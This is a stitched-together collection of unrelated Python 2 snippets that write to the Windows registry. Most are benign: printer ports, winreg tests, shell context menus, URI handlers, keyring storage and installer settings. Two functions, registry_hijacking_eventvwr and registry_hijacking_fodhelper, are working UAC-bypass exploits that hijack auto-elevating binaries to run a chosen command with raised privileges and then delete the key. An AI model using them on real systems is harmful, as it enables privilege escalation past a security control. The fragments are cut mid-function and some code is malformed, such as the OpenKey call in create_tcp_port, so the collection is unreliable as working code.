def create_rpt_port(self, name='RPT1:'): base_path = (r'SYSTEM\ControlSet001\Control' r'\Print\Monitors\Redirected Port') port_name = name try: _ = OpenKey( HKEY_LOCAL_MACHINE, r'{base}\Ports\{port}'.format(base=base_path, port=port_name), 0, KEY_ALL_ACCESS) print "There is already a port named :{}".format(port_name) return False except WindowsError: try: reg_key = OpenKey(HKEY_LOCAL_MACHINE, base_path, 0, KEY_ALL_ACCESS) new_key = CreateKey(reg_key, 'Ports') reg_key = CreateKey(new_key, port_name) SetValueEx(reg_key, 'Description', 0, REG_SZ, 'Redirected Port') SetValueEx(reg_key, 'Command', 0, REG_SZ, '') SetValueEx(reg_key, 'Arguments', 0, REG_SZ, '') SetValueEx(reg_key, 'Printer', 0, REG_SZ, '') SetValueEx(reg_key, 'Output', 0, REG_DWORD, 0) SetValueEx(reg_key, 'Description', 0, REG_DWORD, 0) SetValueEx(reg_key, 'ShowWindow', 0, REG_DWORD, 0) SetValueEx(reg_key, 'RunUser', 0, REG_DWORD, 0) SetValueEx(reg_key, 'Delay', 0, REG_DWORD, 300) SetValueEx(reg_key, 'LogFileUse', 0, REG_DWORD, 0) SetValueEx(reg_key, 'LogFileDebug', 0, REG_DWORD, 0) SetValueEx(reg_key, 'PrintError', 0, REG_DWORD, 0) result = self.__restart_win_service('Spooler') return result except Exception: # noqa return False
def test_CreateKey(self): from _winreg import CreateKey, QueryInfoKey key = CreateKey(self.root_key, self.test_key_name) sub_key = CreateKey(key, "sub_key") nkeys, nvalues, since_mod = QueryInfoKey(key) assert nkeys == 1 nkeys, nvalues, since_mod = QueryInfoKey(sub_key) assert nkeys == 0
def test_SetValueEx(self): from _winreg import CreateKey, SetValueEx, REG_BINARY, REG_DWORD key = CreateKey(self.root_key, self.test_key_name) sub_key = CreateKey(key, "sub_key") SetValueEx(sub_key, 'Int Value', 0, REG_DWORD, None) SetValueEx(sub_key, 'Int Value', 0, REG_DWORD, 45) for name, value, type in self.test_data: SetValueEx(sub_key, name, 0, type, value) exc = raises(TypeError, SetValueEx, sub_key, 'test_name', None, REG_BINARY, memoryview('abc')) assert str(exc.value) == ("Objects of type 'memoryview' can not " "be used as binary registry values")
def registry_hijacking_eventvwr(cmd, params=""): # ''' # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) # ''' HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) mscCmdPath = r'Software\Classes\mscfile\shell\open\command' if params: cmd = '%s %s'.strip() % (cmd, params) try: # The registry key already exist in HKCU, altering... registry_key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) except: # Adding the registry key in HKCU registry_key = CreateKey(HKCU, mscCmdPath) SetValueEx(registry_key, '', 0, REG_SZ, cmd) CloseKey(registry_key) # Executing eventvwr.exe eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True) # Sleeping 5 secds... time.sleep(5) #Clean everything DeleteKey(HKCU, mscCmdPath)
def registry_hijacking_fodhelper(cmd, params=""): HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) fodhelperPath = r'Software\Classes\ms-settings\Shell\Open\command' if params: cmd = '%s %s'.strip() % (cmd, params) try: # The registry key already exist in HKCU, altering... OpenKey(HKCU, fodhelperPath, KEY_SET_VALUE) except: # Adding the registry key in HKCU CreateKey(HKCU, fodhelperPath) registry_key = OpenKey(HKCU, fodhelperPath, 0, KEY_WRITE) SetValueEx(registry_key, 'DelegateExecute', 0, REG_SZ, "") SetValueEx(registry_key, '', 0, REG_SZ, cmd) CloseKey(registry_key) # Creation fodhelper.exe path triggerPath = os.path.join(os.environ['WINDIR'],'System32','fodhelper.exe') # Disables file system redirection for the calling thread (File system redirection is enabled by default) wow64 = ctypes.c_long(0) ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64)) # Executing fodhelper.exe subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True) # Enable file system redirection for the calling thread ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64) # Sleeping 5 secds... time.sleep(5) # Clean everything DeleteKey(HKCU, fodhelperPath)
def add_registry_entry(name, node_id): """ Adds a node to registry. :param name: Node name. :type name: String :param id: Node id. :type id: Integer """ keys = ['Software', 'Classes', '*', 'shell', 'DiWaCS: Open in {0}'.format(name), 'command'] key = '' for k, islast in IterIsLast(keys): key += k if key == '' else '\\' + k try: rkey = OpenKey(HKEY_CURRENT_USER, key, 0, KEY_ALL_ACCESS) except: rkey = CreateKey(HKEY_CURRENT_USER, key) if islast: rpath = u'send_file_to.exe {0} "%1"'.format(node_id) regpath = os.path.join(os.getcwdu(), rpath) SetValueEx(rkey, '', 0, REG_SZ, regpath) if rkey: CloseKey(rkey)
def registerUriHandler(): from _winreg import CreateKey, SetValueEx, HKEY_CURRENT_USER, REG_SZ, CloseKey regKeys = [] regKeys.append(['Software\\Classes\\fightcade', '', 'URL:fightcade Protocol']) regKeys.append(['Software\\Classes\\fightcade', 'URL Protocol', ""]) regKeys.append(['Software\\Classes\\fightcade\\shell', '', None]) regKeys.append(['Software\\Classes\\fightcade\\shell\\open', '', None]) for key,name,val in regKeys: registryKey = CreateKey(HKEY_CURRENT_USER, key) SetValueEx(registryKey, name, 0, REG_SZ, val) CloseKey(registryKey) regKeysU = [] regKeysU.append(['Software\\Classes\\fightcade\\shell\\open\\command', '', os.path.abspath(sys.argv[0])+' "%1"']) for key,name,val in regKeysU: registryKey = CreateKey(HKEY_CURRENT_USER, key) SetValueEx(registryKey, name, 0, REG_SZ, val) CloseKey(registryKey)
def set_password(self, service, username, password): """Write the password to the registry """ # encrypt the password password_encrypted = self.crypt_handler.encrypt(password) # encode with base64 password_base64 = password_encrypted.encode("base64") # store the password from _winreg import HKEY_CURRENT_USER, CreateKey, SetValueEx, REG_SZ hkey = CreateKey(HKEY_CURRENT_USER, r'Software\%s\Keyring' % service) SetValueEx(hkey, username, 0, REG_SZ, password_base64)
def test_reflection_unsupported(self): import sys if sys.getwindowsversion() >= (5, 2): skip("Requires Windows XP") from _winreg import (CreateKey, DisableReflectionKey, EnableReflectionKey, QueryReflectionKey, DeleteKeyEx) with CreateKey(self.root_key, self.test_key_name) as key: raises(NotImplementedError, DisableReflectionKey, key) raises(NotImplementedError, EnableReflectionKey, key) raises(NotImplementedError, QueryReflectionKey, key) raises(NotImplementedError, DeleteKeyEx, self.root_key, self.test_key_name)
def test_long_key(self): from _winreg import (HKEY_CURRENT_USER, KEY_ALL_ACCESS, CreateKey, SetValue, EnumKey, REG_SZ, QueryInfoKey, OpenKey, DeleteKey) name = 'x' * 256 try: with CreateKey(HKEY_CURRENT_USER, self.test_key_name) as key: SetValue(key, name, REG_SZ, 'x') num_subkeys, num_values, t = QueryInfoKey(key) EnumKey(key, 0) finally: with OpenKey(HKEY_CURRENT_USER, self.test_key_name, 0, KEY_ALL_ACCESS) as key: DeleteKey(key, name) DeleteKey(HKEY_CURRENT_USER, self.test_key_name)
def store_shell_configs(self): if not self.dirty: return promoted = [] list = self.topmenulist for row in range(list.count()): cmd = self.menu_cmds[list.item(row)._id] promoted.append(cmd) hkey = CreateKey(HKEY_CURRENT_USER, "Software\\" + THGKEY) SetValueEx(hkey, PROMOTEDITEMS, 0, REG_SZ, ','.join(promoted)) for name, info in vars.iteritems(): default, regkey, regtype, evalfunc, wrfunc, cbattr = info if cbattr == None: continue checkbutton = getattr(self, cbattr) v = wrfunc(checkbutton.isChecked()) hkey = CreateKey(HKEY_CURRENT_USER, 'Software\\' + regkey) SetValueEx(hkey, name, 0, regtype, v) self.dirty = False self.update_states()
def reg_set(path, name, value, key=HKEY_CURRENT_USER, key_type=REG_SZ): # Write in the Windows Registry. try: reg = ConnectRegistry(None, key) CreateKey(reg, path) try: registry_key = OpenKey(reg, path, 0, KEY_WRITE) except OpenKeyError: registry_key = OpenKey(reg, path, 0, KEY_WRITE | KEY_WOW64_64KEY) SetValueEx(registry_key, name, 0, key_type, value) CloseKey(reg) # Update the Windows behaviour. # SendMessage(win32con.HWND_BROADCAST, win32con.WM_SETTINGCHANGE, 0, 'Environment') return True except ConnectRegistryError: print('You should run this command as system administrator: run the terminal as administrator and type the command again.') except WindowsError: return False
def create_tcp_port(self, port_name, ip_address, port=9100): base_path = (r'SYSTEM\ControlSet001\Control' r'\Print\Monitors\Standard TCP/IP Port\Ports') reg_key = OpenKey(HKEY_LOCAL_MACHINE, base_path, 0, KEY_ALL_ACCESS) try: _ = QueryValueEx(reg_key, 'StatusUpdateEnabled')[0] # noqa except WindowsError: SetValueEx(reg_key, 'StatusUpdateEnabled', 0, REG_DWORD, 1) try: _ = QueryValueEx(reg_key, 'StatusUpdateInterval')[0] # noqa except WindowsError: SetValueEx(reg_key, 'StatusUpdateInterval', 0, REG_DWORD, 10) CloseKey(reg_key) try: _ = OpenKey(HKEY_LOCAL_MACHINE, r'{base}\{port}'.format(base=base_path, port=port_name), 0, KEY_ALL_ACCESS) # noqa print "There is already a port named :" + port_name return False except WindowsError: try: reg_key = OpenKey(HKEY_LOCAL_MACHINE, base_path, 0, KEY_ALL_ACCESS) CreateKey(reg_key, port_name) CloseKey(reg_key) reg_key = OpenKey( HKEY_LOCAL_MACHINE, base_path + '\\' + port_name, r'{base}\{port}'.format(base=base_path, port=port_name), 0, KEY_ALL_ACCESS) SetValueEx(reg_key, 'Protocol', 0, REG_DWORD, 1) SetValueEx(reg_key, 'Version', 0, REG_DWORD, 1) SetValueEx(reg_key, 'HostName', 0, REG_SZ, '') SetValueEx(reg_key, 'IPAddress', 0, REG_SZ, ip_address) SetValueEx(reg_key, 'HWAddress', 0, REG_SZ, '') SetValueEx(reg_key, 'PortNumber', 0, REG_DWORD, port) SetValueEx(reg_key, 'SNMP Community', 0, REG_SZ, 'public') SetValueEx(reg_key, 'SNMP Enabled', 0, REG_DWORD, 1) SetValueEx(reg_key, 'SNMP Index', 0, REG_DWORD, 1) result = self.__restart_win_service('Spooler') return result except Exception: # noqa return False
def init_regkeys(self, regkeys): """Initializes the registry to avoid annoying popups, configure settings, etc. @param regkeys: the root keys, subkeys, and key/value pairs. """ for rootkey, subkey, values in regkeys: key_handle = CreateKey(rootkey, subkey) for key, value in values.items(): if isinstance(value, str): SetValueEx(key_handle, key, 0, REG_SZ, value) elif isinstance(value, int): SetValueEx(key_handle, key, 0, REG_DWORD, value) elif isinstance(value, dict): self.init_regkeys([ [rootkey, "%s\\%s" % (subkey, key), value], ]) else: raise CuckooPackageError("Invalid value type: %r" % value) CloseKey(key_handle)
def update(key_name_path, subkey, desired_value, desired_type, goal, what): (key, name, path) = key_name_path (old_value, old_type) = open_and_query(key, path, subkey, what) or (None, None) if (old_value, old_type) == (desired_value, desired_type): print "Already done: %s." % (goal,) return False try: update_key = OpenKey(key, path, 0, KEY_SET_VALUE|KEY_QUERY_VALUE) except WindowsError, e: if e.winerror != 2: raise DistutilsSetupError("I tried to %s, but was not successful because I could not open " "the registry key %s\\%s for writing.\n%r" % (goal, name, path, e)) try: update_key = CreateKey(key, path) except WindowsError, e: raise DistutilsSetupError("I tried to %s, but was not successful because the registry key %s\\%s " "did not exist, and I was unable to create it.\n%r" % (goal, name, path, e))
def get_key(hkey, subkey, access, is_existed=True): registry_key = None try: if PlatformHelper.is_64bit_machine(): registry_key = win32api.RegOpenKeyEx( hkey, subkey, 0, win32con.WRITE_OWNER | win32con.KEY_WOW64_64KEY | win32con.KEY_ALL_ACCESS) else: registry_key = OpenKey(hkey, subkey, 0, access) except WindowsError: try: if is_existed: registry_key = CreateKey(hkey, subkey) else: registry_key = None except WindowsError as e: LogHelper.error(str(e)) if registry_key: RegistryHelper.close_key(registry_key) raise Exception('Fail to get Registry key.') return registry_key
def add_project_registry_entry(reg_type): """ Adds "Add to project" context menu item to registry. The item will be added to Software\\Classes\\<reg_type>, where <reg_type> can be e.g. '*' for all files or 'Folder' for folders. :param reg_type: Registry type. :type reg_type: String """ keys = ['Software', 'Classes', reg_type, 'shell', 'DiWaCS: Add to project', 'command'] key = '' for k, islast in IterIsLast(keys): key += k if key == '' else '\\' + k try: rkey = OpenKey(HKEY_CURRENT_USER, key, 0, KEY_ALL_ACCESS) except: rkey = CreateKey(HKEY_CURRENT_USER, key) if islast: mypath = os.path.join(os.getcwd(), 'add_file.exe ') rpath = '{0} "%1"'.format(mypath) SetValueEx(rkey, '', 0, REG_SZ, rpath) CloseKey(rkey)
from _winreg import (OpenKey, QueryValueEx, CreateKey, SetValueEx, SetValue, KEY_ALL_ACCESS, HKEY_CLASSES_ROOT, REG_SZ) for protocol_name in PROTOCOLS: try: with OpenKey(HKEY_CLASSES_ROOT, r'%s\shell\open\command' % protocol_name) as key: val, _ = QueryValueEx(key, None) # What if you have a portable sublime? and you move it # somewhere? if DEBUG or sys.executable not in val: raise WindowsError except WindowsError: with CreateKey(HKEY_CLASSES_ROOT, protocol_name) as key: def setvalue(value='', subkey=None, value_name=None): if value_name: with OpenKey(key, None, 0, KEY_ALL_ACCESS) as h: SetValueEx(h, value_name, 0, REG_SZ, value) else: SetValue(key, subkey, REG_SZ, value) setvalue('URL:%s Protocol Handler' % protocol_name) setvalue(value_name='URL Protocol', value='') # Can't use string formatting: { %s } # v v setvalue( (r'"$EXE" --command "open_protocol_url {\"url\": \"%1\"}"'.
# Post-install script for Qct Windows MSI # Configure default values for Qct preferences from _winreg import HKEY_LOCAL_MACHINE, REG_SZ, CreateKey, SetValueEx, QueryValueEx key = CreateKey(HKEY_LOCAL_MACHINE, 'Software\\vcs\\Qct\\tools') try: value, type = QueryValueEx(key, 'diffTool') except WindowsError: SetValueEx(key, 'diffTool', 0, REG_SZ, 'hg vdiff') try: value, type = QueryValueEx(key, 'histTool') except WindowsError: SetValueEx(key, 'histTool', 0, REG_SZ, 'hg view') try: value, type = QueryValueEx(key, 'editTool') except WindowsError: SetValueEx(key, 'editTool', 0, REG_SZ, 'notepad')
def test_SetValueEx(self): from _winreg import CreateKey, SetValueEx key = CreateKey(self.root_key, self.test_key_name) sub_key = CreateKey(key, "sub_key") for name, value, type in self.test_data: SetValueEx(sub_key, name, 0, type, value)
installDir = ("C:\Program Files\Path_Validator\\") Infile = ("Path_Validator-V1.0-Windows-x86.exe") print curnt + Infile print installDir + Infile if not os.path.exists(installDir): os.makedirs(installDir) try: os.rename(curnt + Infile, installDir + Infile) except WindowsError as er: logging.exception("\n\n Something Has Gone Wrong!") exit() #Registry Setup, DONT TOUCH THESE keyVal = r'Directory\Background\shell\Validate Paths\\command' try: key = OpenKey(_winreg.HKEY_CLASSES_ROOT, keyVal, 0, _winreg.KEY_ALL_ACCESS) except: key = CreateKey(_winreg.HKEY_CLASSES_ROOT, keyVal) SetValueEx( key, "", 0, _winreg.REG_SZ, r"C:\Program Files\Path_Validator\Path_Validator-V1.0-Windows-x86.exe %V") CloseKey(key) exit()